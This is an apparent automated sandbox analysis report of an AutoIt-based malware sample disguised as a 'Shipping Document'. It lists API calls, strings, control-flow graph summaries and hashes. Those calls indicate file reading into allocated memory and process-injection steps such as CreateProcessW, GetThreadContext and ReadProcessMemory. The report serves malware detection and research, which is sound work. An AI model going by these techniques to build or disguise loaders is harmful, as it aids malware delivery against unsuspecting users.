                              • Opcode Fuzzy Hash: 45b6d7d708c5d502dd9899b82c489eb0771d8099f8e59c56387f9bac9699dc03
                              • Instruction Fuzzy Hash: 3041F8F2618107BBDB24AB68EE4BF7D3755FB00390F14411DF68686295CA6F9D00B7A1

                              Control-flow Graph

                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                              • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                              • API String ID: 1825951767-3513169116
                              • Opcode ID: d99ad63cde1df99c72cb1177670b946cfea92f7859b49c206aeeddd6737209ec
                              • Instruction ID: 42d73942faf3f7e099cb60b71ace65c8f5adcaddd310caa40fc04a71464456fe
                              • Opcode Fuzzy Hash: d99ad63cde1df99c72cb1177670b946cfea92f7859b49c206aeeddd6737209ec
                              • Instruction Fuzzy Hash: E6A17E72C0422E9ACB14EBA1CD96FEEB778BF14340F04442DF452A7191DF796A09EB60

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 942 1e52660-1e5270e call 1e50000 945 1e52715-1e5273b call 1e53570 CreateFileW 942->945 948 1e52742-1e52752 945->948 949 1e5273d 945->949 957 1e52754 948->957 958 1e52759-1e52773 VirtualAlloc 948->958 950 1e5288d-1e52891 949->950 951 1e528d3-1e528d6 950->951 952 1e52893-1e52897 950->952 954 1e528d9-1e528e0 951->954 955 1e528a3-1e528a7 952->955 956 1e52899-1e5289c 952->956 961 1e52935-1e5294a 954->961 962 1e528e2-1e528ed 954->962 963 1e528b7-1e528bb 955->963 964 1e528a9-1e528b3 955->964 956->955 957->950 959 1e52775 958->959 960 1e5277a-1e52791 ReadFile 958->960 959->950 965 1e52793 960->965 966 1e52798-1e527d8 VirtualAlloc 960->966 969 1e5294c-1e52957 VirtualFree 961->969 970 1e5295a-1e52962 961->970 967 1e528f1-1e528fd 962->967 968 1e528ef 962->968 971 1e528bd-1e528c7 963->971 972 1e528cb 963->972 964->963 965->950 973 1e527df-1e527fa call 1e537c0 966->973 974 1e527da 966->974 975 1e52911-1e5291d 967->975 976 1e528ff-1e5290f 967->976 968->961 969->970 971->972 972->951 982 1e52805-1e5280f 973->982 974->950 979 1e5291f-1e52928 975->979 980 1e5292a-1e52930 975->980 978 1e52933 976->978 978->954 979->978 980->978 983 1e52811-1e52840 call 1e537c0 982->983 984 1e52842-1e52856 call 1e535d0 982->984 983->982 989 1e52858 984->989 990 1e5285a-1e5285e 984->990 989->950 992 1e52860-1e52864 FindCloseChangeNotification 990->992 993 1e5286a-1e5286e 990->993 992->993 994 1e52870-1e5287b VirtualFree 993->994 995 1e5287e-1e52887 993->995 994->995 995->945 995->950
                              APIs
                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01E52731
                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01E52957
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516553081.0000000001E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_1e50000_Shipping Document.jbxd
                              Similarity
                              • API ID: CreateFileFreeVirtual
                              • String ID:
                              • API String ID: 204039940-0
                              • Opcode ID: 30e8af4b53c3aa052917812e21e5e8fbde56ed90f0e39d50c947676a587081b9
                              • Instruction ID: ebe385aebbd2ce933d2d2090609cb1e138ce696dba19e3d87424e43a6306830a
                              • Opcode Fuzzy Hash: 30e8af4b53c3aa052917812e21e5e8fbde56ed90f0e39d50c947676a587081b9
                              • Instruction Fuzzy Hash: F5A1F974E0020AEBDB54CFE4C894BEEBBB5BF48304F209559EA15BB280D7759A41CF94

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1073 fc39e7-fc3a57 CreateWindowExW * 2 ShowWindow * 2
                              APIs
                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FC3A15
                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FC3A36
                              • ShowWindow.USER32(00000000,?,?), ref: 00FC3A4A
                              • ShowWindow.USER32(00000000,?,?), ref: 00FC3A53
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Window$CreateShow
                              • String ID: AutoIt v3$edit
                              • API String ID: 1584632944-3779509399
                              • Opcode ID: 646e8708ae788bc3332677d1b1e664ab5b19ca07c9a11129a261167811363c6b
                              • Instruction ID: 7ebdb3b6ecf06439ea5d9d9ed5fc68bd8a8a48cfb515acc314752cfa6fe6d04b
                              • Opcode Fuzzy Hash: 646e8708ae788bc3332677d1b1e664ab5b19ca07c9a11129a261167811363c6b
                              • Instruction Fuzzy Hash: 70F03AB46442A07FEA305667AC48F2B3E7DE7C6F51B02006EB980E6154C2AF0810CBB0

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1074 1e52410-1e52556 call 1e50000 call 1e52300 CreateFileW 1081 1e5255d-1e5256d 1074->1081 1082 1e52558 1074->1082 1085 1e52574-1e5258e VirtualAlloc 1081->1085 1086 1e5256f 1081->1086 1083 1e5260d-1e52612 1082->1083 1087 1e52590 1085->1087 1088 1e52592-1e525a9 ReadFile 1085->1088 1086->1083 1087->1083 1089 1e525ad-1e525e7 call 1e52340 call 1e51300 1088->1089 1090 1e525ab 1088->1090 1095 1e52603-1e5260b ExitProcess 1089->1095 1096 1e525e9-1e525fe call 1e52390 1089->1096 1090->1083 1095->1083 1096->1095
                              APIs
                                • Part of subcall function 01E52300: Sleep.KERNELBASE(000001F4), ref: 01E52311
                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01E5254C
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516553081.0000000001E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_1e50000_Shipping Document.jbxd
                              Similarity
                              • API ID: CreateFileSleep
                              • String ID: X8UL0HX1JWQI2KFT
                              • API String ID: 2694422964-465430296
                              • Opcode ID: 14af9af5724919459c0576f0552d3c974b63454b1ae8eb60d8aaf14a31a89b73
                              • Instruction ID: 5c5a67bb87b1f9bd287df06dc7b8e263fa9aeb9af21af885fbcd1118bc1c8988
                              • Opcode Fuzzy Hash: 14af9af5724919459c0576f0552d3c974b63454b1ae8eb60d8aaf14a31a89b73
                              • Instruction Fuzzy Hash: E7518330D14249EBEF11DBA4D854BEEBB79AF18304F004199E609BB2C1D7B91B45CBA5

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1098 fc410d-fc4123 1099 fc4129-fc413e call fc7b76 1098->1099 1100 fc4200-fc4204 1098->1100 1103 ffd5dd-ffd5ec LoadStringW 1099->1103 1104 fc4144-fc4164 call fc7d2c 1099->1104 1107 ffd5f7-ffd60f call fc7c8e call fc7143 1103->1107 1104->1107 1108 fc416a-fc416e 1104->1108 1117 fc417e-fc41fb call fe3020 call fc463e call fe2ffc Shell_NotifyIconW call fc5a64 1107->1117 1120 ffd615-ffd633 call fc7e0b call fc7143 call fc7e0b 1107->1120 1110 fc4174-fc4179 call fc7c8e 1108->1110 1111 fc4205-fc420e call fc81a7 1108->1111 1110->1117 1111->1117 1117->1100 1120->1117
                              APIs
                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00FFD5EC
                                • Part of subcall function 00FC7D2C: _memmove.LIBCMT ref: 00FC7D66
                              • _memset.LIBCMT ref: 00FC418D
                              • _wcscpy.LIBCMT ref: 00FC41E1
                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FC41F1
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                              • String ID: Line:
                              • API String ID: 3942752672-1585850449
                              • Opcode ID: a77c837405a3dd1097a038d360eeaf050098d827406eb49a3b78065598649046
                              • Instruction ID: 24e9563eebccdcd3d755366eb59b60df959d11939afaa08e39a5d241782725ec
                              • Opcode Fuzzy Hash: a77c837405a3dd1097a038d360eeaf050098d827406eb49a3b78065598649046
                              • Instruction Fuzzy Hash: 1431DE71408306AAD331FB60DE47FDE77E8AF44310F14491EB1C492092EF79A648EB92

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1133 fe564d-fe5666 1134 fe5668-fe566d 1133->1134 1135 fe5683 1133->1135 1134->1135 1137 fe566f-fe5671 1134->1137 1136 fe5685-fe568b 1135->1136 1138 fe568c-fe5691 1137->1138 1139 fe5673-fe5678 call fe8d68 1137->1139 1140 fe569f-fe56a3 1138->1140 1141 fe5693-fe569d 1138->1141 1151 fe567e call fe8ff6 1139->1151 1144 fe56a5-fe56b0 call fe3020 1140->1144 1145 fe56b3-fe56b5 1140->1145 1141->1140 1143 fe56c3-fe56d2 1141->1143 1149 fe56d9 1143->1149 1150 fe56d4-fe56d7 1143->1150 1144->1145 1145->1139 1148 fe56b7-fe56c1 1145->1148 1148->1139 1148->1143 1153 fe56de-fe56e3 1149->1153 1150->1153 1151->1135 1155 fe57cc-fe57cf 1153->1155 1156 fe56e9-fe56f0 1153->1156 1155->1136 1157 fe56f2-fe56fa 1156->1157 1158 fe5731-fe5733 1156->1158 1157->1158 1161 fe56fc 1157->1161 1159 fe579d-fe579e call ff0df7 1158->1159 1160 fe5735-fe5737 1158->1160 1170 fe57a3-fe57a7 1159->1170 1165 fe575b-fe5766 1160->1165 1166 fe5739-fe5741 1160->1166 1162 fe57fa 1161->1162 1163 fe5702-fe5704 1161->1163 1169 fe57fe-fe5807 1162->1169 1167 fe570b-fe5710 1163->1167 1168 fe5706-fe5708 1163->1168 1173 fe576a-fe576d 1165->1173 1174 fe5768 1165->1174 1171 fe5743-fe574f 1166->1171 1172 fe5751-fe5755 1166->1172 1175 fe5716-fe572f call ff0f18 1167->1175 1176 fe57d4-fe57d8 1167->1176 1168->1167 1169->1136 1170->1169 1177 fe57a9-fe57ae 1170->1177 1178 fe5757-fe5759 1171->1178 1172->1178 1173->1176 1179 fe576f-fe577b call fe4916 call ff10ab 1173->1179 1174->1173 1193 fe5792-fe579b 1175->1193 1183 fe57ea-fe57f5 call fe8d68 1176->1183 1184 fe57da-fe57e7 call fe3020 1176->1184 1177->1176 1182 fe57b0-fe57c1 1177->1182 1178->1173 1194 fe5780-fe5785 1179->1194 1189 fe57c4-fe57c6 1182->1189 1183->1151 1184->1183 1189->1155 1189->1156 1193->1189 1195 fe580c-fe5810 1194->1195 1196 fe578b-fe578e 1194->1196 1195->1169 1196->1162 1197 fe5790 1196->1197 1197->1193
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                              • String ID:
                              • API String ID: 1559183368-0
                              • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                              • Instruction ID: 8fbf7aabba6e59a3e66e9ebb07997f9bb5e4f8291921101491087935e54d3118
                              • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                              • Instruction Fuzzy Hash: A751D631E00B89DBDB249F7BCC8466E77A1AF40B38F248729F835962D1D7749D60AB50
                              APIs
                                • Part of subcall function 00FC4F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,010862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FC4F6F
                              • _free.LIBCMT ref: 00FFE68C
                              • _free.LIBCMT ref: 00FFE6D3
                                • Part of subcall function 00FC6BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00FC6D0D
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: _free$CurrentDirectoryLibraryLoad
                              • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                              • API String ID: 2861923089-1757145024
                              • Opcode ID: 4f70efe5afac5d34d584d9aeba05ffc812d9a500af8d820b91ebe921494d2ee5
                              • Instruction ID: d894aaac13a131cf341749d6745c481dc230da8b20d7a352b559d5710ea98645
                              • Opcode Fuzzy Hash: 4f70efe5afac5d34d584d9aeba05ffc812d9a500af8d820b91ebe921494d2ee5
                              • Instruction Fuzzy Hash: 9B917C7191021EAFCF04EFA4CD91AEDB7B4FF19314B04446DE955EB2A1DB34A904EB60
                              APIs
                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00FC35A1,SwapMouseButtons,00000004,?), ref: 00FC35D4
                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00FC35A1,SwapMouseButtons,00000004,?,?,?,?,00FC2754), ref: 00FC35F5
                              • RegCloseKey.KERNELBASE(00000000,?,?,00FC35A1,SwapMouseButtons,00000004,?,?,?,?,00FC2754), ref: 00FC3617
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: CloseOpenQueryValue
                              • String ID: Control Panel\Mouse
                              • API String ID: 3677997916-824357125
                              • Opcode ID: 846fc89c7d1c62e6dba3e3aaec79be5112a943407fee046c241046e3c3151073
                              • Instruction ID: 51b0b8de385be5e9a5db51853e5b14600c4ace1cc4d39fca8759814c0e0a5163
                              • Opcode Fuzzy Hash: 846fc89c7d1c62e6dba3e3aaec79be5112a943407fee046c241046e3c3151073
                              • Instruction Fuzzy Hash: EE115AB5910209BFDB208F68D985EEEB7B8EF44790F018459F805D7200D2729F40B760
                              APIs
                              • CreateProcessW.KERNELBASE(?,00000000), ref: 01E51ABB
                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01E51B51
                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01E51B73
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516553081.0000000001E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_1e50000_Shipping Document.jbxd
                              Similarity
                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                              • String ID:
                              • API String ID: 2438371351-0
                              • Opcode ID: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                              • Instruction ID: 343b55d221c74cc42ac10ac425e9e4b4f23e3457988415dbd3079bc74d29d80f
                              • Opcode Fuzzy Hash: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                              • Instruction Fuzzy Hash: 54621C30A14258DBEB64CFA4C850BDEB772EF58304F1091A9E60DEB390E7759E81CB59
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                              • String ID:
                              • API String ID: 2782032738-0
                              • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                              • Instruction ID: e1889389d640fa65a9388f781399392d8cd151b699414527d1cf581cba6bc81c
                              • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                              • Instruction Fuzzy Hash: 66412771A007869BDF28CEABC8809AF77A6EF84770B24817DE855D7641D738FD40AB44
                              APIs
                              • _memset.LIBCMT ref: 00FFEE62
                              • GetOpenFileNameW.COMDLG32(?), ref: 00FFEEAC
                                • Part of subcall function 00FC48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FC48A1,?,?,00FC37C0,?), ref: 00FC48CE
                                • Part of subcall function 00FE09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FE09F4
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Name$Path$FileFullLongOpen_memset
                              • String ID: X
                              • API String ID: 3777226403-3081909835
                              • Opcode ID: 07f175fb5148739110afa21914a26d7036a4ba6a7fe06e81df59553c8bd85750
                              • Instruction ID: 487e06258b2fe61a18e142f2c93696563fbed220ded97816d43b4f0a6264da1c
                              • Opcode Fuzzy Hash: 07f175fb5148739110afa21914a26d7036a4ba6a7fe06e81df59553c8bd85750
                              • Instruction Fuzzy Hash: 50210531E0028C9BCB15DF94CC46BEE7BF89F49314F00405AE508E7281DBB85A899FA1
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: __fread_nolock_memmove
                              • String ID: EA06
                              • API String ID: 1988441806-3962188686
                              • Opcode ID: 954647f3c50da98899e2b8dd367b92cea36953b4fa2f2367fbf5673d4fe5298c
                              • Instruction ID: b2ec82df62cc72ade451f37bb559ceec6c7709401c63930de1a6b10455563a60
                              • Opcode Fuzzy Hash: 954647f3c50da98899e2b8dd367b92cea36953b4fa2f2367fbf5673d4fe5298c
                              • Instruction Fuzzy Hash: FB01F972904268AEDB28C6A9CC56EEE7BF89B01205F00419EF592D2181E579A704DB60
                              APIs
                              • GetTempPathW.KERNEL32(00000104,?), ref: 01029B82
                              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 01029B99
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Temp$FileNamePath
                              • String ID: aut
                              • API String ID: 3285503233-3010740371
                              • Opcode ID: 34d7c2d742fe6b283b1911b823e99b38a5659b681b63d8e87d0f0679604c786d
                              • Instruction ID: 16243388befa27dc80b4b056e124228f41ada5a43e2b30f4f664d0b07e5355b6
                              • Opcode Fuzzy Hash: 34d7c2d742fe6b283b1911b823e99b38a5659b681b63d8e87d0f0679604c786d
                              • Instruction Fuzzy Hash: 97D05EB994030EBBDB209A94DD4EF9A772CE704700F0042A1BE9496091DEB655988B95
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 637166013c82fd67c198acb3cc3ad71192af955735b5e0d688621c6500499624
                              • Instruction ID: 61cd67564388175c8ad3a80955a8f79410de2af0176c1d299b5a9eb982593894
                              • Opcode Fuzzy Hash: 637166013c82fd67c198acb3cc3ad71192af955735b5e0d688621c6500499624
                              • Instruction Fuzzy Hash: EAF17670A083019FC710DF68C984A6ABBE9FFC8314F44896EF8999B251D775E945CF82
                              APIs
                                • Part of subcall function 00FE03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FE03D3
                                • Part of subcall function 00FE03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00FE03DB
                                • Part of subcall function 00FE03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FE03E6
                                • Part of subcall function 00FE03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FE03F1
                                • Part of subcall function 00FE03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00FE03F9
                                • Part of subcall function 00FE03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00FE0401
                                • Part of subcall function 00FD6259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00FCFA90), ref: 00FD62B4
                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00FCFB2D
                              • OleInitialize.OLE32(00000000), ref: 00FCFBAA
                              • CloseHandle.KERNEL32(00000000), ref: 010049F2
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                              • String ID:
                              • API String ID: 1986988660-0
                              • Opcode ID: ddca10068eb5e4cbe7ad801cf2310b957ede49741d0830538077be1fc6905c87
                              • Instruction ID: d334abb05db924e4cbbf01e6cefff0216b6e5b586f5238bff6422716886ff552
                              • Opcode Fuzzy Hash: ddca10068eb5e4cbe7ad801cf2310b957ede49741d0830538077be1fc6905c87
                              • Instruction Fuzzy Hash: 1081AAB09092518FC3A4EF7DE65561D7AE6FB58304B12A12EA0D9CB35AEF3F44048F61
                              APIs
                              • _memset.LIBCMT ref: 00FC4401
                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FC44A6
                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00FC44C3
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
